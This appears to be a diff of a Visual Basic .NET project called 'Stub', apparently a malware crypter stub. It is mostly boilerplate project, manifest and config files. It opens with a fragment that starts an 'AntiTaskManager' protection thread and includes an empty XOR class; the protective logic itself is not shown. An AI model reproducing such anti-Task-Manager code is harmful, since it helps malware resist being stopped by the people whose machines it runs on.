Private Function AntiTaskManager() As Boolean
Dim H As New AntiTaskManager
Control.CheckForIllegalCrossThreadCalls = False
Dim F As New Threading.Thread(AddressOf H.protect)
F.Start()
End Function
End Module
@@ -0,0 +1,13 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.18408
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
@@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<MySubMain>false</MySubMain>
<MainForm>Form1</MainForm>
<SingleInstance>false</SingleInstance>
<ShutdownMode>0</ShutdownMode>
<EnableVisualStyles>true</EnableVisualStyles>
<AuthenticationMode>0</AuthenticationMode>
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
</MyApplicationData>
@@ -0,0 +1,58 @@
<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- Options du manifeste de contrôle de compte d'utilisateur
Si vous souhaitez modifier le niveau du contrôle de compte d'utilisateur Windows, remplacez le nœud
requestedExecutionLevel par l'une des propositions suivantes.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
La spécification du nœud requestedExecutionLevel désactivera la virtualisation de fichiers et du Registre.
Si vous souhaitez utiliser la virtualisation de fichiers et du Registre pour la compatibilité
descendante, supprimez le noeud requestedExecutionLevel.
-->
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Liste de toutes les versions de Windows avec lesquelles cette application peut fonctionner.
Windows sélectionnera automatiquement l'environnement le plus compatible.-->
<!-- Si votre application est conçue pour fonctionner avec Windows Vista, supprimez les commentaires du nœud supportedOS suivant-->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>-->
<!-- Si votre application est conçue pour fonctionner avec Windows 7, supprimez les commentaires du nœud supportedOS suivant-->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>-->
<!-- Si votre application est conçue pour fonctionner avec Windows 8, supprimez les commentaires du nœud supportedOS suivant-->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>-->
<!-- Si votre application est conçue pour fonctionner avec Windows 8.1, supprimez les commentaires du nœud supportedOS suivant-->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>-->
</application>
</compatibility>
<!-- Activer les thèmes pour les contrôles et boîtes de dialogue communes de Windows (Windows XP et version ultérieure) -->
<!-- <dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>-->
</asmv1:assembly>
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2012
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "Stub", "Stub.vbproj", "{4CFDE991-8014-428E-BF76-449C96656449}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4CFDE991-8014-428E-BF76-449C96656449}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{4CFDE991-8014-428E-BF76-449C96656449}.Debug|Any CPU.Build.0 = Debug|Any CPU
{4CFDE991-8014-428E-BF76-449C96656449}.Release|Any CPU.ActiveCfg = Release|Any CPU
{4CFDE991-8014-428E-BF76-449C96656449}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
Binary file not shown.
+138
View File
@@ -0,0 +1,138 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProductVersion>9.0.30729</ProductVersion>
<SchemaVersion>2.0</SchemaVersion>
<ProjectGuid>{4CFDE991-8014-428E-BF76-449C96656449}</ProjectGuid>
<OutputType>WinExe</OutputType>
<StartupObject>Sub Main</StartupObject>
<RootNamespace>Stub</RootNamespace>
<AssemblyName>Stub</AssemblyName>
<FileAlignment>512</FileAlignment>
<MyType>WindowsFormsWithCustomSubMain</MyType>
<TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
<OptionExplicit>On</OptionExplicit>
<OptionCompare>Binary</OptionCompare>
<OptionStrict>Off</OptionStrict>
<OptionInfer>On</OptionInfer>
<FileUpgradeFlags>
</FileUpgradeFlags>
<UpgradeBackupLocation>
</UpgradeBackupLocation>
<OldToolsVersion>3.5</OldToolsVersion>
<PublishUrl>publish\</PublishUrl>
<Install>true</Install>
<InstallFrom>Disk</InstallFrom>
<UpdateEnabled>false</UpdateEnabled>
<UpdateMode>Foreground</UpdateMode>
<UpdateInterval>7</UpdateInterval>
<UpdateIntervalUnits>Days</UpdateIntervalUnits>
<UpdatePeriodically>false</UpdatePeriodically>
<UpdateRequired>false</UpdateRequired>
<MapFileExtensions>true</MapFileExtensions>
<ApplicationRevision>0</ApplicationRevision>
<ApplicationVersion>1.0.0.%2a</ApplicationVersion>
<IsWebBootstrapper>false</IsWebBootstrapper>
<UseApplicationTrust>false</UseApplicationTrust>
<BootstrapperEnabled>true</BootstrapperEnabled>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<DefineDebug>true</DefineDebug>
<DefineTrace>true</DefineTrace>
<OutputPath>bin\Debug\</OutputPath>
<DocumentationFile>Stub.xml</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022,42353,42354,42355</NoWarn>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>pdbonly</DebugType>
<DefineDebug>false</DefineDebug>
<DefineTrace>true</DefineTrace>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DocumentationFile>Stub.xml</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022,42353,42354,42355</NoWarn>
<PlatformTarget>x86</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
</PropertyGroup>
<PropertyGroup>
<ApplicationManifest>My Project\app.manifest</ApplicationManifest>
</PropertyGroup>
<PropertyGroup>
<ApplicationIcon>ico.ico</ApplicationIcon>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Deployment" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
<Reference Include="System.Core">
<RequiredTargetFramework>3.5</RequiredTargetFramework>
</Reference>
<Reference Include="System.Xml.Linq">
<RequiredTargetFramework>3.5</RequiredTargetFramework>
</Reference>
<Reference Include="System.Data.DataSetExtensions">
<RequiredTargetFramework>3.5</RequiredTargetFramework>
</Reference>
</ItemGroup>
<ItemGroup>
<Import Include="Microsoft.VisualBasic" />
<Import Include="System" />
<Import Include="System.Collections" />
<Import Include="System.Collections.Generic" />
<Import Include="System.Data" />
<Import Include="System.Drawing" />
<Import Include="System.Diagnostics" />
<Import Include="System.Windows.Forms" />
<Import Include="System.Linq" />
<Import Include="System.Xml.Linq" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.vb" />
<Compile Include="Module3.vb" />
<Compile Include="Module4.vb" />
<Compile Include="My Project\Application.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Application.myapp</DependentUpon>
</Compile>
<Compile Include="XORR.vb" />
</ItemGroup>
<ItemGroup>
<None Include="app.config" />
<None Include="My Project\app.manifest" />
<None Include="My Project\Application.myapp">
<Generator>MyApplicationCodeGenerator</Generator>
<LastGenOutput>Application.Designer.vb</LastGenOutput>
</None>
</ItemGroup>
<ItemGroup>
<BootstrapperPackage Include="Microsoft.Net.Client.3.5">
<Visible>False</Visible>
<ProductName>.NET Framework 3.5 SP1 Client Profile</ProductName>
<Install>false</Install>
</BootstrapperPackage>
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
<Visible>False</Visible>
<ProductName>.NET Framework 3.5 SP1</ProductName>
<Install>true</Install>
</BootstrapperPackage>
</ItemGroup>
<ItemGroup>
<Content Include="ico.ico" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->
</Project>
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="utf-8"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="12.0">
<PropertyGroup>
<PublishUrlHistory />
<InstallUrlHistory />
<SupportUrlHistory />
<UpdateUrlHistory />
<BootstrapperUrlHistory />
<ErrorReportUrlHistory />
<FallbackCulture>en-US</FallbackCulture>
<VerifyUploadedFiles>false</VerifyUploadedFiles>
<ProjectView>ShowAllFiles</ProjectView>
</PropertyGroup>
</Project>
+11
View File
@@ -0,0 +1,11 @@
Class XORR
Private _hamzao As String
Sub New(Hamzao As String)
' TODO: Complete member initialization
_hamzao = Hamzao
End Sub
End Class
+23
View File
@@ -0,0 +1,23 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<system.diagnostics>
<sources>
<!-- This section defines the logging configuration for My.Application.Log -->
<source name="DefaultSource" switchName="DefaultSwitch">
<listeners>
<add name="FileLog"/>
<!-- Uncomment the below section to write to the Application Event Log -->
<!--<add name="EventLog"/>-->
</listeners>
</source>
</sources>
<switches>
<add name="DefaultSwitch" value="Information"/>
</switches>
<sharedListeners>
<add name="FileLog" type="Microsoft.VisualBasic.Logging.FileLogTraceListener, Microsoft.VisualBasic, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL" initializeData="FileLogWriter"/>
<!-- Uncomment the below section and replace APPLICATION_NAME with the name of your application to write to the Application Event Log -->
<!--<add name="EventLog" type="System.Diagnostics.EventLogTraceListener" initializeData="APPLICATION_NAME"/> -->
</sharedListeners>
</system.diagnostics>
<startup><supportedRuntime version="v2.0.50727"/></startup></configuration>
Binary file not shown.

After

Width:  |  Height:  |  Size: 38 KiB